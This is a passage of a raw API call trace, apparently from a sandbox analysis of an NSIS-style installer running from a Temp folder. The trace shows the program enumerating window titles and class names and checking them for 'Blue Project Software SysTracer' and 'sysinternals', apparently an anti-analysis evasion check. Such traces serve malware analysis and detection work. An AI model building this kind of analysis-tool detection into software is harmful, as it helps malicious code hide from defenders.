[0158.673] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.673] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.673] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.673] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.673] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.673] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.673] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.673] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.673] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") 
returned="Call" [0158.673] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.674] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.674] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.674] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.674] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.674] lstrcpynA (in: lpString1=0x3401e0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.674] lstrcpynA (in: lpString1=0x341200, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.674] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.674] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.674] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.674] strstr (_Str="Start", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.674] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.674] lstrcpynA (in: lpString1=0x3401e0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.674] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.674] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.675] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: 
lpString1="") returned="" [0158.675] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.675] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.675] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.675] lstrlenA (lpString="0") returned 1 [0158.675] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.675] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.675] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.675] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.675] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.675] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.675] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.675] lstrlenA (lpString="0") returned 1 [0158.675] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.675] lstrlenA (lpString="Start") returned 5 [0158.675] lstrcpynA (in: lpString1=0x33723c, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.676] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.676] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.676] lstrlenA (lpString="3399936") returned 7 [0158.676] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | 
out: lpString1="3399936") returned="3399936" [0158.676] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.676] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.676] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.676] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.676] lstrcpynA (in: lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.676] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.676] lstrcpynA (in: lpString1=0x337684, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.676] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.676] lstrlenA (lpString="") returned 0 [0158.676] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.676] lstrcpynA (in: lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.676] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.676] lstrcpynA (in: lpString1=0x337acc, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.676] lstrcpynA (in: lpString1=0x432c00, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.676] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.676] lstrlenA (lpString="") returned 0 [0158.676] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" 
[0158.677] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.677] lstrlenA (lpString="") returned 0 [0158.677] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.677] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.677] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.677] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.677] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.677] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.677] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.677] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.677] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t 
R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.677] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.677] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.677] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.678] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.678] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.678] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.678] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.678] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.678] lstrcpynA (in: lpString1=0x341200, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.678] lstrcpynA (in: lpString1=0x3401e0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.678] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.678] lstrcpynA (in: lpString1=0x340df8, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.678] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") 
returned="" [0158.679] strstr (_Str="Start", _SubStr="sysinternals") returned 0x0 [0158.679] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.679] lstrcpynA (in: lpString1=0x341200, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.679] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.680] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.680] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.680] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.680] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.680] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.680] lstrlenA (lpString="0") returned 1 [0158.680] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.680] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.680] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.680] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.681] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.681] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.681] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.681] lstrlenA (lpString="0") returned 1 [0158.681] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: 
lpString1="1") returned="1" [0158.681] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.681] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.681] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.681] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.681] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.681] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.681] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.681] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.681] lstrlenA (lpString="3399936") returned 7 [0158.681] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" 
[0158.681] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.681] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.681] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.682] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.682] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.682] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.682] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.682] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.682] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.682] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65622") returned 5 [0158.682] lstrcpyA (in: lpString1=0x430400, lpString2="65622" | out: lpString1="65622") returned="65622" [0158.682] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.682] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.682] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.683] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.683] lstrlenA (lpString="callback1") returned 9 [0158.683] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.683] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.683] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.683] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.683] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.683] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.683] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.683] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.683] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.683] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.683] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.683] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.683] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.683] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.684] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.684] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.684] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.684] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.684] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.684] lstrcpynA (in: lpString1=0x341200, lpString2="65622", iMaxLength=1024 | out: lpString1="65622") returned="65622" [0158.684] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.684] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" 
[0158.684] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.684] GetWindowTextA (in: hWnd=0x10056, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.685] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.685] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.685] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.685] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65622") returned 5 [0158.685] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.685] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.685] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.685] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.685] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.685] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.685] lstrcpynA (in: lpString1=0x40a418, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.685] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.685] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.685] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.685] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.686] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.686] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.686] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.686] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.686] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.686] lstrcpynA (in: lpString1=0x3401e0, lpString2="65622", iMaxLength=1024 | out: lpString1="65622") returned="65622" [0158.686] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.686] 
